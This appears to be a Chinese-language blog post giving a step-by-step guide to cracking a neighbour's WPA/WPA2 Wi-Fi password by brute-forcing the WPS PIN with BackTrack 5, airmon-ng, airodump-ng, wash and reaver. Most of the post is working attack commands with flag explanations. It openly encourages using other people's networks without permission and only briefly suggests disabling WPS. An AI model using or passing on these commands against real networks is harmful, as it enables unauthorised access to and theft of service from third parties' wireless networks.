用我的无线无线你的无线 - wap/wap2无线网络破解

• 此帖非技术帖，只是记录下网上整理来的各种wap/wap2无线网络破解策略而已，无意扫盲wap/wap2加密原理，只是希望读完此帖，你花上一个晚上的时间，能不用自己买设备，而在这寒冷的冬天坐在你温暖的被窝里，不用拖着网线，“分享”一下你睦邻友舍充满爱心的无线网络，写写博客，逛逛开源社区，也分享分享你的故事......
  
  
• 闲话就不多说了，开始正题，请看：
  • 点我下载BT5
  • 无论你喜欢VMware加载还是U盘加载，都是可以的，本人本本年龄大了，配置也不好，所以比较倾向于U盘加载(4G即可)，只要下载时选择对应的BT5版本即可
  • U盘加载BT5，参照：http://www.2dan.cc/Linux/u-bt5-install/
  • 修改你的BIOS系统加载顺序，怎么修改，参照这儿：Google
  • 好了，应该可以进入BT5了，开shell终端，开始正式干活：

• 查看你的无线网卡端口，以便加载无线网卡(WLAN0或是WLAN1)
  • ifconfig -a
• 加载无线网卡
  • ifconfig wlan0 up
• 将监听模式激活到了mon0
  • airmon-ng start wlan0
• 查看周边路由AP信息
  • airodump-ng mon0
• 特别提示：只有AP开启了WPS、QSS功能，才可以用PIN法PJPSK密码，如何知道AP是否开通了WPS、QSS功能呢？
  • reaver1.3 下使用命令：wash -i mon0 -C 查看，其中（54e.）e后面有点的已开
  • reaver1.4 下用新的指令：WASH -i mon0 -C 其中C是大写，在wps locked 一项中查看
  • WIN7 下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按钮也可以连接”，就确认此AP 开了WPS、QSS
  • PS：亲身试验，上述wash大小写区别不一定正确，大写不行就试试小写，我在reaver1.4下用大写提示找不到命令，小写就OK了
• 再开一个shell窗口，选择开启WPS、QSS功能的AP开始破解
  • reaver -i mon0 -b APMAC -a -S -vv
  • 注意，MAC 中冒号不可省略，MAC 地址的字母大小写均可，-S 是大写字母， -vv是两个v ，不是w
  • 附常见单命令解释
    • -i     监听后接口名称
    • -b    目标MAC地址
    • -a    自动检测目标AP 最佳配置
    • -S    使用最小的DH key（可以提高PJ 速度）
    • -vv   显示更多的非严重警告
    • -d     即delay 每穷举一次的闲置时间 预设为1 秒
    • -t      即timeout 每次穷举等待反馈的最长时间
    • -c     指定频道可以方便找到信号，如-c1 指定1 频道，大家查看自己的目标频道做相应修改
    • -N    不发送nack信息(pin不动时可尝试此参数）如reaver -i mon0 -b MAC -a -S -vv -N
  • 非TP-LINK 路由推荐–d9 –t9 参数防止路由僵死 reaver -i mon0 -b MAC -a -S –d9 –t9 -vv(个人建议：慎用，因为我用了两次，貌似AP都死了，适得其反啊)
  • 推荐用最简单的：reaver -i -b APMAC -vv
• 得到pin码后，用下命令得到AP密码
  • reaver -i mon0 -b APMAC -p PIN
  
  
  
• PS:
  • 没有开启WPS、QSS功能且加密方式为wap/wap2的AP劝君珍惜生命，远离它;所以赶快禁用掉你的WPS、QSS吧
  • 之所以写此帖，是为了自己在闲暇之余有趣地用用Linux，也顺便扩展扩展知识面，蹭网只是其次的其次的再其次
  • 如果你实在太那个(大家都懂的)，想家里到处都玩的happy，又不想花金子，那么真心祝你永远不要PJ成功，如果侥幸得手，那请稍微那么道德点，不要只顾自己happy，拿AP真正的主人卡飞了